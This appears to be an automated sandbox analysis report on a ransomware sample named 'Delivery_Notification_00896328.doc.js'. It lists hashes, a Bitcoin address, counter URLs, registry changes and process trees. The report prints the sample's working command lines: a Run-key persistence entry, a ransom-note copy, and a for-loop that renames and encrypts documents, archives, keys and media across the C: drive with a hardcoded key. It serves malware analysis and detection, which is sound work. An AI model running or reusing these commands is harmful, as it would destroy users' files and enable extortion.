Analysis

max time kernel: 142s
max time network: 144s
platform: windows7_x64
resource: win7v20201028
submitted: 17-01-2021 18:02
Static task: static1

Behavioral task: behavioral1
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win10v20201028
General

Target: Delivery_Notification_00896328.doc.js
Size: 248KB
MD5: 0168089428c6aa371f4275d0872b0970
SHA1: d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
SHA256: dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
SHA512: 915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config

Extracted from C:\Users\Admin\AppData\Local\Temp\a.txt:
- 19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
- http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Signatures

Blocklisted process makes network request (7 IoCs)
Processes: wscript.exe
  flow  pid   process
  8     1668  wscript.exe
  9     1668  wscript.exe
  11    1668  wscript.exe
  13    1668  wscript.exe
  15    1668  wscript.exe
  16    1668  wscript.exe
  18    1668  wscript.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
  - Key created: \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" (reg.exe)

Modifies registry class (7 IoCs)
Processes: reg.exe, reg.exe
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" (reg.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command (reg.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted (reg.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell (reg.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open (reg.exe)
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" (reg.exe)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted (reg.exe)

Modifies system certificate store
Processes: wscript.exe
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (wscript.exe)
  - Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob data not included in this report] (wscript.exe)

Suspicious use of WriteProcessMemory (27 IoCs)
Processes: wscript.exe, cmd.exe, cmd.exe, cmd.exe
Each of the following writes was recorded three times (9 distinct pid/target pairs, 27 IoCs in total):
  description                      pid   process      target process
  PID 1668 wrote to memory of 1124  1668  wscript.exe  cmd.exe
  PID 1668 wrote to memory of 956   1668  wscript.exe  cmd.exe
  PID 1668 wrote to memory of 1088  1668  wscript.exe  cmd.exe
  PID 1668 wrote to memory of 404   1668  wscript.exe  cmd.exe
  PID 1668 wrote to memory of 1964  1668  wscript.exe  cmd.exe
  PID 1668 wrote to memory of 1548  1668  wscript.exe  cmd.exe
  PID 956 wrote to memory of 2040   956   cmd.exe      reg.exe
  PID 1088 wrote to memory of 808   1088  cmd.exe      reg.exe
  PID 1124 wrote to memory of 436   1124  cmd.exe      reg.exe
Processes

[1] C:\Windows\system32\wscript.exe
    command: wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
    - Blocklisted process makes network request
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
            - Adds Run key to start application

    [2] C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            command: REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
            - Modifies registry class

    [2] C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            command: REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
            - Modifies registry class

    [2] C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"

    [2] C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"

    [2] C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" j8gyi4wwg36auqdeq12n3teg9kvlq4uph454)
Downloads

C:\Users\Admin\AppData\Local\Temp\a.txt
  MD5: 512ad548377714262b373c665f17d1db
  SHA1: 0f05efd559b90eb77418c32fa86cfcba77b6e187
  SHA256: 27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
  SHA512: f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943

Memory dumps:
- memory/404-6-0x0000000000000000-mapping.dmp
- memory/436-12-0x0000000000000000-mapping.dmp
- memory/808-10-0x0000000000000000-mapping.dmp
- memory/956-4-0x0000000000000000-mapping.dmp
- memory/1088-5-0x0000000000000000-mapping.dmp
- memory/1124-3-0x0000000000000000-mapping.dmp
- memory/1332-2-0x000007FEF5D40000-0x000007FEF5FBA000-memory.dmp (filesize: 2.5MB)
- memory/1548-8-0x0000000000000000-mapping.dmp
- memory/1964-7-0x0000000000000000-mapping.dmp
- memory/2040-9-0x0000000000000000-mapping.dmp